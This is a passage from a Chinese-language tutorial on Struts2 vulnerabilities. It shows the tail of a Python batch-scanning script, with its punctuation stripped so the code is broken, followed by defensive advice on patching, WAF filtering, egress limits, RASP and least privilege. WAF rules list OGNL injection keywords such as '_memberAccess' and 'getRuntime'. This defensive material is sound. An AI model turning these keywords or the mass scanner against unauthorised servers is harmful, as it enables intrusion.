ThreadPoolExecutor(max_workers5) as executor: future_to_url {executor.submit(scan_single_url, url): url for url in urls} for future in as_completed(future_to_url): url future_to_url[future] try: url, result future.result() all_results.append({url: url, result: result}) print(fFinished scanning: {url}) except Exception as exc: print(f{url} generated an exception: {exc}) # 将汇总结果保存到文件 with open(batch_scan_results.json, w) as f: json.dump(all_results, f, indent2) print(f\nScan completed. Results saved to batch_scan_results.json) # 简单统计打印存在漏洞的URL print(\n[] Vulnerable Targets Found:) for item in all_results: res item[result] if isinstance(res, dict) and res.get(vulnerable) True: # 根据实际工具的输出结构调整 print(f - {item[url]}: {res.get(vuln_id, N/A)}) if __name__ __main__: if len(sys.argv) ! 2: print(fUsage: {sys.argv[0]} url_list.txt) sys.exit(1) main(sys.argv[1])这个脚本提供了基本的并发扫描和结果聚合功能。在实际集成中你需要根据所用扫描工具的实际输出格式是打印到屏幕还是生成文件JSON结构如何来调整解析逻辑。7. 防御视角如何防范Struts2漏洞被利用作为一名安全从业者我们不仅要懂得如何发现漏洞更要明白如何修复和防御。从防御者角度看应对Struts2漏洞治本和治标需结合。7.1 治本之策升级与修复官方补丁密切关注Apache Struts官方安全公告一旦有漏洞公布立即评估影响并升级到已修复的版本。这是最根本、最有效的方法。建立内部的软件成分分析SCA流程持续盘点所有项目中使用的Struts2版本。代码审计如果因历史原因无法立即升级需要对受影响的代码进行人工审计或使用IAST交互式应用安全测试工具定位到使用了漏洞组件的具体位置尝试通过代码层面对输入进行严格的过滤和校验。框架替换对于新建项目应尽量避免使用已停止维护或漏洞频发的老旧框架。考虑迁移到更现代、维护更积极的MVC框架如Spring MVC。7.2 治标之策外围防护与缓解WAF规则部署在应用前端部署WAF并确保其规则库更新到最新能够识别和拦截常见的Struts2 OGNL注入攻击模式。可以自定义规则针对Content-Type头、特定参数名如redirect:中包含的OGNL关键字#,,_memberAccess,getRuntime等进行过滤。网络层限制严格限制服务器出站流量。即使攻击者成功执行了命令如果无法将结果回传DNS、HTTP外带或下载后续恶意软件其攻击效果也会大打折扣。使用防火墙策略或主机防火墙如iptables限制服务器只能访问必要的内部服务和特定的外部更新源。运行时保护RASP在应用服务器上部署RASP解决方案。RASP能深入到应用运行时内部监控OGNL表达式的解析和执行过程一旦发现试图调用危险方法如Runtime.exec()、ProcessBuilder.start()立即中断并告警。这种方式不依赖特征码防御效果更好。最小权限原则运行Struts2应用的服务器进程如Tomcat的Java进程应使用非root、低权限的用户身份运行。这样即使被攻破攻击者能造成的破坏也有限。工具的价值在于帮助我们快速发现风险而真正的安全在于持续性的治理和扎实的防护措施。将这个Struts2检测工具纳入你的安全武器库定期对授权资产进行扫描同时推动开发团队修复漏洞、升级框架才能构筑起主动防御的安全体系。
